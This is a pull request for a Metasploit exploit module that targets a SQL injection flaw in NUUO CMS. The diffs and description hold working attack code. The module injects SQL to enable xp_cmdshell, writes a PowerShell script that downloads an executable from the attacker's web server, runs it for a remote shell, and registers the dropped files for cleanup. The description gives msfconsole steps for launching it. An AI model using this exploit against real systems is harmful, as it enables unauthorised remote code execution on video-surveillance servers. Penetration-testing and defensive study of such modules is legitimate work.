### PR TITLE
Nuuo cms sqli update

### DIFF
--- a/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::Nuuo
   include Msf::Exploit::Remote::HttpServer
 
@@ -44,7 +45,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,                  # we run as NETWORK_SERVICE
       'DisclosureDate' => 'Oct 11 2018',
       'DefaultTarget'  => 0))
-    register_options [Opt::RPORT(5180)]
+    register_options [
+      Opt::RPORT(5180),
+      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
+      OptString.new('URIPATH', [true,  'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
+    ]
   end
 
 
@@ -66,8 +71,11 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Sending the payload to CMS...')
     send_response(cli, @pl)
 
+    Rex.sleep(3)
+
     print_status('Executing shell...')
     inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
+    register_file_for_cleanup("c:/windows/temp/#{@filename}")
   end
 
   def create_hex_cmd(cmd)
@@ -79,6 +87,26 @@ class MetasploitModule < Msf::Exploit::Remote
     hex_cmd << "; exec (@#{var})"
   end
 
+  def primer
+    # we need to roll our own here instead of using the MSSQL mixins
+    # (tried that and it doesn't work)
+    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
+    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
+    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
+    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
+    download_pl = %{xp_cmdshell }
+    download_pl << %{'cd C:\\windows\\temp\\ && }
+    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
+    download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
+    download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
+    download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
+    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}
+
+    print_status('Injecting PowerShell payload')
+    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
+    register_file_for_cleanup("c:/windows/temp/#{ps1}")
+  end
+
   def exploit
     nucs_login
 
@@ -87,7 +115,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     @pl = generate_payload_exe
-    resource_uri = "/#{rand_text_alpha(8..16)}"
 
     #do not use SSL
     if datastore['SSL']
@@ -95,30 +122,10 @@ class MetasploitModule < Msf::Exploit::Remote
       datastore['SSL'] = false
     end
 
-    service_url = "http://#{srvhost_addr}:#{srvport}#{resource_uri}"
-    print_status("Starting up our web service on #{service_url} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => resource_uri
-    }})
-
-    datastore['SSL'] = true if ssl_restore
-
-    # we need to roll our own here instead of using the MSSQL mixins
-    # (tried that and it doesn't work)
-    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
-    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
-    download_pl = %{xp_cmdshell }
-    download_pl << %{'cd C:\\windows\\temp\\ && }
-    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
-    download_pl << %{echo $url = "#{service_url}" >> wget.ps1 && }
-    download_pl << %{echo $file = "#{@filename}" >> wget.ps1 && }
-    download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
-    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
-
-    print_status('Injecting PowerShell payload')
-    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) {super}
+    rescue Timeout::Error
+      datastore['SSL'] = true if ssl_restore
+    end
   end
 end

--- a/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
@@ -44,11 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,                  # we run as NETWORK_SERVICE
       'DisclosureDate' => 'Oct 11 2018',
       'DefaultTarget'  => 0))
-    register_options(
-      [
-        Opt::RPORT(5180),
-        OptInt.new('SLEEP', [true, 'How long to wait for the payload download', '15']),
-      ])
+    register_options [Opt::RPORT(5180)]
   end
 
 
@@ -68,8 +64,10 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
     print_good('Sending the payload to CMS...')
-    @exe_sent = true
     send_response(cli, @pl)
+
+    print_status('Executing shell...')
+    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
   end
 
   def create_hex_cmd(cmd)
@@ -89,7 +87,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     @pl = generate_payload_exe
-    @exe_sent = false
     resource_uri = "/#{rand_text_alpha(8..16)}"
 
     #do not use SSL
@@ -112,29 +109,16 @@ class MetasploitModule < Msf::Exploit::Remote
     # we need to roll our own here instead of using the MSSQL mixins
     # (tried that and it doesn't work)
     print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
-    filename = "#{rand_text_alpha_lower(8..10)}.exe"
+    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
     download_pl = %{xp_cmdshell }
     download_pl << %{'cd C:\\windows\\temp\\ && }
     download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
     download_pl << %{echo $url = "#{service_url}" >> wget.ps1 && }
-    download_pl << %{echo $file = "#{filename}" >> wget.ps1 && }
+    download_pl << %{echo $file = "#{@filename}" >> wget.ps1 && }
     download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
     download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
 
     print_status('Injecting PowerShell payload')
     inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
-
-    counter = 0
-    while (not @exe_sent || counter >= datastore['SLEEP'])
-      Rex.sleep(1)
-      counter += 1
-    end
-
-    unless @exe_sent
-      fail_with(Failure::Unknown, 'Could not get CMS to download the payload')
-    end
-
-    print_status('Executing shell...')
-    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{filename}\""), true)
   end
 end


### PR DESCRIPTION
I changed around some of the logic for the server timeout to follow the [httpclient and httpserver wiki page](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-module-using-HttpServer-and-HttpClient). I change `URIPATH` to required and by default set it to a random value. This avoids the problem of a random `resource_uri` being generated if one is not provided to `#start_service`. I used the `FileDropper` mixin as well to register the ps1 and exe for cleanup.

I didn't want to push directly to your branch this time since my NCS Server is being a bit unstable.

## Verification steps

[ ] `./msfconsole -q`
[ ] `use exploit/windows/nuuo/nuuo_cms_sqli`
[ ] `set rhosts [rhost]`
[ ] `set srvhost [srvhost]`
[ ] `exploit`